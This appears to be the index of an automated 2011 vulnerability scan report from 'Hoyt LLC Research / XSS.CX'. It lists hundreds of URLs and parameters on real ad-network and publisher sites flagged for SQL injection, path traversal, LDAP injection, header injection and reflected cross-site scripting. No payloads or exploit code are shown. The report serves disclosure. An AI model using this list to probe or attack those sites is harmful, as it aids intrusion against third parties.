XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05112011-01

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Wed May 11 12:17:52 CDT 2011.

1. SQL injection

1.1. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11 [name of an arbitrarily supplied request parameter]

1.2. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11 [sz parameter]

1.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [campID parameter]

1.4. http://ad.doubleclick.net/adi/N4682.287481.RADIUMONE.COM/B5267998.2 [sz parameter]

1.5. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.2 [name of an arbitrarily supplied request parameter]

1.6. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5 [name of an arbitrarily supplied request parameter]

1.7. http://ad.doubleclick.net/adj/N4270.Media6Degrees.com/B5279322.4 [name of an arbitrarily supplied request parameter]

1.8. http://ad.doubleclick.net/adj/N4270.Media6Degrees.com/B5279322.4 [sz parameter]

1.9. http://ad.doubleclick.net/adj/N6715.274177.WEBMD.COM/B5443050.15 [name of an arbitrarily supplied request parameter]

1.10. http://ad.doubleclick.net/adj/N6715.274177.WEBMD.COM/B5443050.15 [sz parameter]

1.11. http://ad.doubleclick.net/adj/trb.zap2it/ntl/people [name of an arbitrarily supplied request parameter]

1.12. http://cspix.media6degrees.com/orbserv/hbpix [acs cookie]

1.13. http://cspix.media6degrees.com/orbserv/hbpix [clid cookie]

1.14. http://m.trb.com/b/ss/tribglobal/1/H.22.1/s59644513663370 [REST URL parameter 4]

1.15. http://map.media6degrees.com/orbserv/hbpix [rdrlst cookie]

1.16. http://p.addthis.com/pixel [key parameter]

1.17. http://player.ooyala.com/player.js [autoplay parameter]

1.18. http://www.mayoclinic.com/health/pink-eye/DS00258 [REST URL parameter 3]

1.19. http://www.mayoclinic.com/health/pink-eye/DS00258 [name of an arbitrarily supplied request parameter]

1.20. http://www.starpulse.com/sp_comments/paginate_comments.php [object_type parameter]

1.21. http://www.zap2it.com/zap-partners-iframe,0,2002648.blurb [name of an arbitrarily supplied request parameter]

2. File path traversal

2.1. http://cdn.starpulse.com/feed/include/feature.inc.12-03-2010.php [featurecat parameter]

2.2. http://cdn.starpulse.com/feed/include/feature.inc.12-03-2010.php [featuretype parameter]

2.3. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [mName parameter]

3. LDAP injection

3.1. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]

3.2. http://cspix.media6degrees.com/orbserv/hbpix [rdrlst cookie]

3.3. http://data.cmcore.com/imp [ci parameter]

3.4. http://oascentral.blogher.org/RealMedia/ads/adstream_jx.ads/blogher.org.parenting.mybeautifulday/2011/05/pink-eye-html/@Middle,Left!Middle [OAX cookie]

4. HTTP header injection

4.1. http://ad.doubleclick.net/ad/N5019.252469.POPSUGAR.COM/B5379556.47 [REST URL parameter 1]

4.2. http://ad.doubleclick.net/ad/N6374.137661.GLAM/B5287030.24 [REST URL parameter 1]

4.3. http://ad.doubleclick.net/ad/sugar.pop/track [REST URL parameter 1]

4.4. http://ad.doubleclick.net/adi/N2581.rocketfuel/B5063370.11 [REST URL parameter 1]

4.5. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11 [REST URL parameter 1]

4.6. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [REST URL parameter 1]

4.7. http://ad.doubleclick.net/adi/N4682.154173.9484049199421/B5387915.3 [REST URL parameter 1]

4.8. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5270832.35 [REST URL parameter 1]

4.9. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5285699.7 [REST URL parameter 1]

4.10. http://ad.doubleclick.net/adi/N5685.127408.8193638746421/B5509356.2 [REST URL parameter 1]

4.11. http://ad.doubleclick.net/adi/N6374.137661.GLAM/B5287030.20 [REST URL parameter 1]

4.12. http://ad.doubleclick.net/adi/sugar.tres/gallery [REST URL parameter 1]

4.13. http://ad.doubleclick.net/adj/N2434.access/B5401633 [REST URL parameter 1]

4.14. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.2 [REST URL parameter 1]

4.15. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5 [REST URL parameter 1]

4.16. http://ad.doubleclick.net/adj/N4270.Media6Degrees.com/B5279322.3 [REST URL parameter 1]

4.17. http://ad.doubleclick.net/adj/N4518.z2i/B5479389.3 [REST URL parameter 1]

4.18. http://ad.doubleclick.net/adj/N4518.z2i/B5479389.4 [REST URL parameter 1]

4.19. http://ad.doubleclick.net/adj/N4518.z2i/B5479389.7 [REST URL parameter 1]

4.20. http://ad.doubleclick.net/adj/N5687.135388.BIZO/B5483330 [REST URL parameter 1]

4.21. http://ad.doubleclick.net/adj/bnet.C0609/P0249 [REST URL parameter 1]

4.22. http://ad.doubleclick.net/adj/cm.starpulse/srb_jbl_042911 [REST URL parameter 1]

4.23. http://ad.doubleclick.net/adj/edh.mayoclinic/eyevision/general [REST URL parameter 1]

4.24. http://ad.doubleclick.net/adj/sugar.tres/gallery [REST URL parameter 1]

4.25. http://ad.doubleclick.net/adj/sugar.tres/ros [REST URL parameter 1]

4.26. http://ad.doubleclick.net/adj/trb.zap2it/ntl/community [REST URL parameter 1]

4.27. http://ad.doubleclick.net/adj/trb.zap2it/ntl/hp [REST URL parameter 1]

4.28. http://ad.doubleclick.net/adj/trb.zap2it/ntl/video [REST URL parameter 1]

4.29. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

4.30. http://ad.doubleclick.net/pfadx/starpulse_cim/ [name of an arbitrarily supplied request parameter]

4.31. http://ad.doubleclick.net/pfadx/starpulse_cim/ [secure parameter]

4.32. http://ad.doubleclick.net/pfadx/zap2it_cim/ [name of an arbitrarily supplied request parameter]

4.33. http://ad.doubleclick.net/pfadx/zap2it_cim/ [secure parameter]

4.34. http://amch.questionmarket.com/adsc/d872313/2/873601/adscout.php [ES cookie]

4.35. http://bidder.mathtag.com/iframe/notify [exch parameter]

4.36. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

4.37. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

4.38. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

4.39. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [$ parameter]

4.40. http://c7.zedo.com/utils/ecSet.js [v parameter]

4.41. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/SDUW4IOBWFCKJBD7TJN7TI/22NAU6HRG5G2PGRKDKJIVI [REST URL parameter 2]

4.42. http://www22.glam.com/cTagsImgCmd.act [gname parameter]

5. Cross-site scripting (reflected)

5.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

5.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

5.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

5.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

5.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

5.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

5.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]

5.8. http://480-adver-view.c3metrics.com/v.js [id parameter]

5.9. http://480-adver-view.c3metrics.com/v.js [t parameter]

5.10. http://a.collective-media.net/adj/bzo.217/L3_5490311 [REST URL parameter 2]

5.11. http://a.collective-media.net/adj/bzo.217/L3_5490311 [REST URL parameter 3]

5.12. http://a.collective-media.net/adj/bzo.217/L3_5490311 [name of an arbitrarily supplied request parameter]

5.13. http://a.collective-media.net/adj/bzo.217/L3_5490311 [sz parameter]

5.14. http://a.collective-media.net/adj/cm.pub_webmd/ [REST URL parameter 2]

5.15. http://a.collective-media.net/adj/cm.pub_webmd/ [name of an arbitrarily supplied request parameter]

5.16. http://a.collective-media.net/adj/cm.pub_webmd/ [sz parameter]

5.17. http://a.collective-media.net/adj/cm.starpulse/srb_jbl_042911 [REST URL parameter 2]

5.18. http://a.collective-media.net/adj/cm.starpulse/srb_jbl_042911 [REST URL parameter 3]

5.19. http://a.collective-media.net/adj/cm.starpulse/srb_jbl_042911 [name of an arbitrarily supplied request parameter]

5.20. http://a.collective-media.net/adj/cm.starpulse/srb_jbl_042911 [srb parameter]

5.21. http://a.collective-media.net/adj/edh.mayoclinic/eyevision/general [REST URL parameter 2]

5.22. http://a.collective-media.net/adj/edh.mayoclinic/eyevision/general [REST URL parameter 3]

5.23. http://a.collective-media.net/adj/edh.mayoclinic/eyevision/general [REST URL parameter 4]

5.24. http://a.collective-media.net/adj/edh.mayoclinic/eyevision/general [cmn parameter]

5.25. http://a.collective-media.net/adj/edh.mayoclinic/eyevision/general [name of an arbitrarily supplied request parameter]

5.26. http://a.collective-media.net/cmadj/bzo.217/L3_5490311 [REST URL parameter 1]

5.27. http://a.collective-media.net/cmadj/bzo.217/L3_5490311 [REST URL parameter 2]

5.28. http://a.collective-media.net/cmadj/bzo.217/L3_5490311 [REST URL parameter 3]

5.29. http://a.collective-media.net/cmadj/bzo.217/L3_5490311 [sz parameter]

5.30. http://a.collective-media.net/cmadj/edh.mayoclinic/eyevision/general [REST URL parameter 1]

5.31. http://a.collective-media.net/cmadj/edh.mayoclinic/eyevision/general [REST URL parameter 2]

5.32. http://a.collective-media.net/cmadj/edh.mayoclinic/eyevision/general [REST URL parameter 3]

5.33. http://a.collective-media.net/cmadj/edh.mayoclinic/eyevision/general [REST URL parameter 4]

5.34. http://a.collective-media.net/cmadj/edh.mayoclinic/eyevision/general [cmn parameter]

5.35. http://a.rfihub.com/sed [pa parameter]

5.36. http://ad.burstdirectads.com/st [name of an arbitrarily supplied request parameter]

5.37. http://ad.burstdirectads.com/st [name of an arbitrarily supplied request parameter]

5.38. http://ad.doubleclick.net/adi/N2581.rocketfuel/B5063370.11 [name of an arbitrarily supplied request parameter]

5.39. http://ad.doubleclick.net/adi/N2581.rocketfuel/B5063370.11 [sz parameter]

5.40. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.34 [adurl parameter]

5.41. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.34 [ai parameter]

5.42. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.34 [client parameter]

5.43. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.34 [num parameter]

5.44. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.34 [sig parameter]

5.45. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.34 [sz parameter]

5.46. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [campID parameter]

5.47. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [crID parameter]

5.48. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [partnerID parameter]

5.49. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [pub parameter]

5.50. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [pubICode parameter]

5.51. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [sz parameter]

5.52. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.861 [url parameter]

5.53. http://ad.doubleclick.net/adi/N4682.154173.9484049199421/B5387915.2 [name of an arbitrarily supplied request parameter]

5.54. http://ad.doubleclick.net/adi/N4682.154173.9484049199421/B5387915.2 [sz parameter]

5.55. http://ad.doubleclick.net/adi/N4682.154173.9484049199421/B5387915.3 [name of an arbitrarily supplied request parameter]

5.56. http://ad.doubleclick.net/adi/N4682.154173.9484049199421/B5387915.3 [sz parameter]

5.57. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5270832.35 [adurl parameter]

5.58. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5270832.35 [ai parameter]

5.59. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5270832.35 [client parameter]

5.60. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5270832.35 [num parameter]

5.61. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5270832.35 [sig parameter]

5.62. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5270832.35 [sz parameter]

5.63. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5285699.7 [adurl parameter]

5.64. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5285699.7 [ai parameter]

5.65. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5285699.7 [client parameter]

5.66. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5285699.7 [num parameter]

5.67. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5285699.7 [sig parameter]

5.68. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5285699.7 [sz parameter]

5.69. http://ad.doubleclick.net/adj/N2434.access/B5401633 [sz parameter]

5.70. http://ad.doubleclick.net/adj/cardinals.mlb/news [name of an arbitrarily supplied request parameter]

5.71. http://ad.doubleclick.net/adj/cardinals.mlb/news [pageid parameter]

5.72. http://ad.doubleclick.net/adj/cm.starpulse/srb_jbl_042911 [net parameter]

5.73. http://ad.doubleclick.net/adj/rmm.starpulse2/safescholarsus11_us_300x250vid [adurl parameter]

5.74. http://ad.doubleclick.net/adj/rmm.starpulse2/safescholarsus11_us_300x250vid [ai parameter]

5.75. http://ad.doubleclick.net/adj/rmm.starpulse2/safescholarsus11_us_300x250vid [client parameter]

5.76. http://ad.doubleclick.net/adj/rmm.starpulse2/safescholarsus11_us_300x250vid [num parameter]

5.77. http://ad.doubleclick.net/adj/rmm.starpulse2/safescholarsus11_us_300x250vid [sig parameter]

5.78. http://ad.doubleclick.net/adj/rmm.starpulse2/safescholarsus11_us_300x250vid [sz parameter]

5.79. http://ad.doubleclick.net/adj/sugarhouseads/house [name of an arbitrarily supplied request parameter]

5.80. http://ad.doubleclick.net/adj/trb.zap2it/ntl/community [pos parameter]

5.81. http://ad.doubleclick.net/adj/trb.zap2it/ntl/community [rs parameter]

5.82. http://ad.doubleclick.net/adj/trb.zap2it/ntl/hp [;ptype parameter]

5.83. http://ad.doubleclick.net/adj/trb.zap2it/ntl/hp [name of an arbitrarily supplied request parameter]

5.84. http://ad.doubleclick.net/adj/trb.zap2it/ntl/people [dcopt parameter]

5.85. http://ad.doubleclick.net/adj/trb.zap2it/ntl/people [pos parameter]

5.86. http://ad.doubleclick.net/adj/trb.zap2it/ntl/people [sz parameter]

5.87. http://ad.doubleclick.net/adj/trb.zap2it/ntl/video [rs parameter]

5.88. http://ad.media6degrees.com/adserv/cs [name of an arbitrarily supplied request parameter]

5.89. http://ad.media6degrees.com/adserv/cs [tId parameter]

5.90. http://ad.technoratimedia.com/st [name of an arbitrarily supplied request parameter]

5.91. http://ad.turn.com/server/bid/fan.bid [requestId parameter]

5.92. http://ad.turn.com/server/pixel.htm [fpid parameter]

5.93. http://ad.turn.com/server/pixel.htm [sp parameter]

5.94. http://ad.yieldmanager.com/getbid [callback parameter]

5.95. http://ad.yieldmanager.com/getbid [u parameter]

5.96. http://ads.adbrite.com/adserver/vdi/753292 [REST URL parameter 3]

5.97. http://ads.pointroll.com/PortalServe/ [flash parameter]

5.98. http://ads.pointroll.com/PortalServe/ [redir parameter]

5.99. http://ads.pointroll.com/PortalServe/ [time parameter]

5.100. http://ads.specificmedia.com/serve/v=5 [m parameter]

5.101. http://ads.specificmedia.com/serve/v=5 [name of an arbitrarily supplied request parameter]

5.102. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [auto_ctl_invite parameter]

5.103. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [code parameter]

5.104. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [lang parameter]

5.105. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [loc parameter]

5.106. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [name of an arbitrarily supplied request parameter]

5.107. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [noiframe parameter]

5.108. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [p parameter]

5.109. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [protocol parameter]

5.110. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [site parameter]

5.111. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

5.112. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

5.113. http://api.zap2it.com/tvlistings/webservices/celebsontv [callback parameter]

5.114. http://api.zap2it.com/tvlistings/webservices/checkin [callback parameter]

5.115. http://api.zap2it.com/tvlistings/webservices/checkin [md parameter]

5.116. http://api.zap2it.com/tvlistings/webservices/peopleFinder [callback parameter]

5.117. http://api.zap2it.com/tvlistings/webservices/peopleFinder [name parameter]

5.118. http://api.zap2it.com/tvlistings/zbPrimeTimeGrid.jsp [aid parameter]

5.119. http://api.zap2it.com/tvlistings/zbPrimeTimeGrid.jsp [name of an arbitrarily supplied request parameter]

5.120. http://api.zap2it.com/tvlistings/zbPrimeTimeGrid.jsp [sList parameter]

5.121. http://api.zap2it.com/tvlistings/zbPrimeTimeGrid.jsp [v parameter]

5.122. http://ar.voicefive.com/b/rc.pli [func parameter]

5.123. http://b.scorecardresearch.com/beacon.js [c1 parameter]

5.124. http://b.scorecardresearch.com/beacon.js [c10 parameter]

5.125. http://b.scorecardresearch.com/beacon.js [c15 parameter]

5.126. http://b.scorecardresearch.com/beacon.js [c2 parameter]

5.127. http://b.scorecardresearch.com/beacon.js [c3 parameter]

5.128. http://b.scorecardresearch.com/beacon.js [c4 parameter]

5.129. http://b.scorecardresearch.com/beacon.js [c5 parameter]

5.130. http://b.scorecardresearch.com/beacon.js [c6 parameter]

5.131. http://b3.mookie1.com/2/RubiconB3/ATTWL/11Q1/T1/728/1458638753@x90 [REST URL parameter 2]

5.132. http://b3.mookie1.com/2/RubiconB3/ATTWL/11Q1/T1/728/1458638753@x90 [REST URL parameter 3]

5.133. http://b3.mookie1.com/2/RubiconB3/ATTWL/11Q1/T1/728/1458638753@x90 [REST URL parameter 4]

5.134. http://b3.mookie1.com/2/RubiconB3/ATTWL/11Q1/T1/728/1458638753@x90 [REST URL parameter 5]

5.135. http://b3.mookie1.com/2/RubiconB3/ATTWL/11Q1/T1/728/1458638753@x90 [REST URL parameter 6]

5.136. http://b3.mookie1.com/2/RubiconB3/ATTWL/11Q1/T1/728/1458638753@x90 [REST URL parameter 7]

5.137. http://c5.zedo.com//ads2/f/945899/3840/0/0/305005344/305005344/0/305/510/zz-V1-720x300_1X1.html [REST URL parameter 10]

5.138. http://c5.zedo.com//ads2/f/945899/3840/0/0/305005344/305005344/0/305/510/zz-V1-720x300_1X1.html [REST URL parameter 11]

5.139. http://c5.zedo.com//ads2/f/945899/3840/0/0/305005344/305005344/0/305/510/zz-V1-720x300_1X1.html [REST URL parameter 4]

5.140. http://c5.zedo.com//ads2/f/945899/3840/0/0/305005344/305005344/0/305/510/zz-V1-720x300_1X1.html [REST URL parameter 5]

5.141. http://c5.zedo.com//ads2/f/945899/3840/0/0/305005344/305005344/0/305/510/zz-V1-720x300_1X1.html [REST URL parameter 6]

5.142. http://c5.zedo.com//ads2/f/945899/3840/0/0/305005344/305005344/0/305/510/zz-V1-720x300_1X1.html [REST URL parameter 7]

5.143. http://c5.zedo.com//ads2/f/945899/3840/0/0/305005344/305005344/0/305/510/zz-V1-720x300_1X1.html [REST URL parameter 8]

5.144. http://c5.zedo.com//ads2/f/945899/3840/0/0/305005344/305005344/0/305/510/zz-V1-720x300_1X1.html [REST URL parameter 9]

5.145. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [$ parameter]

5.146. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [$ parameter]

5.147. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [q parameter]

5.148. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [q parameter]

5.149. http://cdn.starpulse.com/feed/include/feature.inc.12-03-2010.php [REST URL parameter 1]

5.150. http://cdn.starpulse.com/feed/include/feature.inc.12-03-2010.php [REST URL parameter 2]

5.151. http://cdn.starpulse.com/feed/include/feature.inc.12-03-2010.php [REST URL parameter 3]

5.152. http://choices.truste.com/ca [c parameter]

5.153. http://choices.truste.com/ca [h parameter]

5.154. http://choices.truste.com/ca [h parameter]

5.155. http://choices.truste.com/ca [plc parameter]

5.156. http://choices.truste.com/ca [w parameter]

5.157. http://choices.truste.com/ca [w parameter]

5.158. http://choices.truste.com/ca [zi parameter]

5.159. http://ct.buzzfeed.com/wd/UserWidget [amp;or parameter]

5.160. http://ct.buzzfeed.com/wd/UserWidget [u parameter]

5.161. http://delb.opt.fimserve.com/adopt/ [sz parameter]

5.162. http://demr.opt.fimserve.com/adopt/ [sz parameter]

5.163. http://ds.addthis.com/red/psi/sites/www.medicinenet.com/p.json [callback parameter]

5.164. http://ds.addthis.com/red/psi/sites/www.shefinds.com/p.json [callback parameter]

5.165. http://event.adxpose.com/event.flow [uid parameter]

5.166. http://fim.adnxs.com/fpt [callback parameter]

5.167. http://fw.adsafeprotected.com/rjsi/dc/9756/84871/adi/N4682.154173.9484049199421/B5387915.3 [REST URL parameter 2]

5.168. http://fw.adsafeprotected.com/rjsi/dc/9756/84871/adi/N4682.154173.9484049199421/B5387915.3 [REST URL parameter 3]

5.169. http://fw.adsafeprotected.com/rjsi/dc/9756/84871/adi/N4682.154173.9484049199421/B5387915.3 [REST URL parameter 4]

5.170. http://fw.adsafeprotected.com/rjsi/dc/9756/84871/adi/N4682.154173.9484049199421/B5387915.3 [REST URL parameter 5]

5.171. http://fw.adsafeprotected.com/rjsi/dc/9756/84871/adi/N4682.154173.9484049199421/B5387915.3 [REST URL parameter 6]

5.172. http://fw.adsafeprotected.com/rjsi/dc/9756/84871/adi/N4682.154173.9484049199421/B5387915.3 [REST URL parameter 7]

5.173. http://fw.adsafeprotected.com/rjsi/dc/9756/84871/adi/N4682.154173.9484049199421/B5387915.3 [name of an arbitrarily supplied request parameter]

5.174. http://fw.adsafeprotected.com/rjsi/dc/9756/84871/adi/N4682.154173.9484049199421/B5387915.3 [sz parameter]

5.175. http://fw.adsafeprotected.com/rjsi/dc/9756/84877/adi/N4682.154173.9484049199421/B5387915.2 [REST URL parameter 2]

5.176. http://fw.adsafeprotected.com/rjsi/dc/9756/84877/adi/N4682.154173.9484049199421/B5387915.2 [REST URL parameter 3]

5.177. http://fw.adsafeprotected.com/rjsi/dc/9756/84877/adi/N4682.154173.9484049199421/B5387915.2 [REST URL parameter 4]

5.178. http://fw.adsafeprotected.com/rjsi/dc/9756/84877/adi/N4682.154173.9484049199421/B5387915.2 [REST URL parameter 5]

5.179. http://fw.adsafeprotected.com/rjsi/dc/9756/84877/adi/N4682.154173.9484049199421/B5387915.2 [REST URL parameter 6]

5.180. http://fw.adsafeprotected.com/rjsi/dc/9756/84877/adi/N4682.154173.9484049199421/B5387915.2 [REST URL parameter 7]

5.181. http://fw.adsafeprotected.com/rjsi/dc/9756/84877/adi/N4682.154173.9484049199421/B5387915.2 [name of an arbitrarily supplied request parameter]

5.182. http://fw.adsafeprotected.com/rjsi/dc/9756/84877/adi/N4682.154173.9484049199421/B5387915.2 [sz parameter]

5.183. http://fw.adsafeprotected.com/rjsi/dc/9791/85906/adi/N4682.287481.RADIUMONE.COM/B5267998.2 [REST URL parameter 2]

5.184. http://fw.adsafeprotected.com/rjsi/dc/9791/85906/adi/N4682.287481.RADIUMONE.COM/B5267998.2 [REST URL parameter 3]

5.185. http://fw.adsafeprotected.com/rjsi/dc/9791/85906/adi/N4682.287481.RADIUMONE.COM/B5267998.2 [REST URL parameter 4]

5.186. http://fw.adsafeprotected.com/rjsi/dc/9791/85906/adi/N4682.287481.RADIUMONE.COM/B5267998.2 [REST URL parameter 5]

5.187. http://fw.adsafeprotected.com/rjsi/dc/9791/85906/adi/N4682.287481.RADIUMONE.COM/B5267998.2 [REST URL parameter 6]

5.188. http://fw.adsafeprotected.com/rjsi/dc/9791/85906/adi/N4682.287481.RADIUMONE.COM/B5267998.2 [REST URL parameter 7]

5.189. http://fw.adsafeprotected.com/rjsi/dc/9791/85906/adi/N4682.287481.RADIUMONE.COM/B5267998.2 [name of an arbitrarily supplied request parameter]

5.190. http://fw.adsafeprotected.com/rjsi/dc/9791/85906/adi/N4682.287481.RADIUMONE.COM/B5267998.2 [sz parameter]

5.191. http://googleads.g.doubleclick.net/pagead/ads [url parameter]

5.192. http://home.onsugar.com/Help-7550950 [REST URL parameter 1]

5.193. http://home.onsugar.com/Help-7550950 [REST URL parameter 1]

5.194. http://home.onsugar.com/Live-OnSugar-7671020 [REST URL parameter 1]

5.195. http://home.onsugar.com/Live-OnSugar-7671020 [REST URL parameter 1]

5.196. http://home.onsugar.com/Our-Blog-7550881 [REST URL parameter 1]

5.197. http://home.onsugar.com/Our-Blog-7550881 [REST URL parameter 1]

5.198. http://home.onsugar.com/api [REST URL parameter 1]

5.199. http://home.onsugar.com/api [REST URL parameter 1]

5.200. http://ib.adnxs.com/ab [ccd parameter]

5.201. http://ib.adnxs.com/ab [custom_macro parameter]

5.202. http://ib.adnxs.com/ptj [redir parameter]

5.203. http://img.mediaplex.com/content/0/14941/119091/DallasCancer-OPEN_728x90.js [mpck parameter]

5.204. http://img.mediaplex.com/content/0/14941/119091/DallasCancer-OPEN_728x90.js [mpck parameter]

5.205. http://img.mediaplex.com/content/0/14941/119091/DallasCancer-OPEN_728x90.js [mpvc parameter]

5.206. http://img.mediaplex.com/content/0/14941/119091/DallasCancer-OPEN_728x90.js [mpvc parameter]

5.207. http://js.revsci.net/gateway/gw.js [csid parameter]

5.208. http://k.collective-media.net/cmadj/cm.pub_webmd/ [REST URL parameter 2]

5.209. http://k.collective-media.net/cmadj/cm.starpulse/srb_jbl_042911 [REST URL parameter 2]

5.210. http://kona5.kontera.com/KonaGet.js [l parameter]

5.211. http://kona5.kontera.com/KonaGet.js [rId parameter]

5.212. http://mpd.mxptint.net/1/S54.API/G1/T83/js [mid parameter]

5.213. http://pglb.buzzfed.com/152897/5431115cf30fb8db156a83665a16d6bf [callback parameter]

5.214. http://pglb.buzzfed.com/36074/2562cc529bca26e674ad88fb4414a137 [callback parameter]

5.215. http://pglb.buzzfed.com/36074/eccf772705f3b3dc37349256b06e34d7 [callback parameter]

5.216. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

5.217. http://rtb.media6degrees.com/adserv/FanBidHandler [callback parameter]

5.218. http://rtb50.doubleverify.com/rtb.ashx/verifyc [callback parameter]

5.219. http://s27.sitemeter.com/js/counter.asp [site parameter]

5.220. http://s27.sitemeter.com/js/counter.js [site parameter]

5.221. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]

5.222. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]

5.223. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]

5.224. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]

5.225. http://starpulse.us.intellitxt.com/al.asp [jscallback parameter]

5.226. http://starpulse.us.intellitxt.com/iframescript.jsp [src parameter]

5.227. http://starpulse.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

5.228. http://starpulse.us.intellitxt.com/v4/advert [jscallback parameter]

5.229. http://starpulse.us.intellitxt.com/v4/context [jscallback parameter]

5.230. http://starpulse.us.intellitxt.com/v4/init [jscallback parameter]

5.231. http://starpulse.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

5.232. http://stlouis.cardinals.mlb.com/news/article.jsp [c_id parameter]

5.233. http://stlouis.cardinals.mlb.com/news/article.jsp [content_id parameter]

5.234. http://stlouis.cardinals.mlb.com/news/article.jsp [name of an arbitrarily supplied request parameter]

5.235. http://stlouis.cardinals.mlb.com/news/article.jsp [notebook_id parameter]

5.236. http://stlouis.cardinals.mlb.com/news/article.jsp [vkey parameter]

5.237. http://stlouis.cardinals.mlb.com/news/article.jsp [ymd parameter]

5.238. http://stlouis.cardinals.mlb.com/style/nav_2011.jsp [section parameter]

5.239. http://tag.admeld.com/ad/json/100/glammedia/160x600/8156650 [REST URL parameter 6]

5.240. http://tag.admeld.com/ad/json/100/glammedia/160x600/8156650 [callback parameter]

5.241. http://tag.admeld.com/ad/json/100/glammedia/160x600/8156650 [container parameter]

5.242. http://tag.admeld.com/ad/json/100/glammedia/300x250/8156650 [REST URL parameter 6]

5.243. http://tag.admeld.com/ad/json/100/glammedia/300x250/8156650 [callback parameter]

5.244. http://tag.admeld.com/ad/json/100/glammedia/300x250/8156650 [container parameter]

5.245. http://theblogfrog.com/widgets/CommunityWidget.aspx [BlogID parameter]

5.246. http://theblogfrog.com/widgets/CommunityWidget.aspx [basecommurl parameter]

5.247. http://theblogfrog.com/widgets/CommunityWidget.aspx [forumn parameter]

5.248. http://theblogfrog.com/widgets/CommunityWidget.aspx [widget_intro parameter]

5.249. http://theblogfrog.com/widgets/CommunityWidget.aspx [widget_title parameter]

5.250. http://theblogfrog.com/widgets/VisitorWidget.aspx [BlogID parameter]

5.251. http://view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

5.252. http://view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

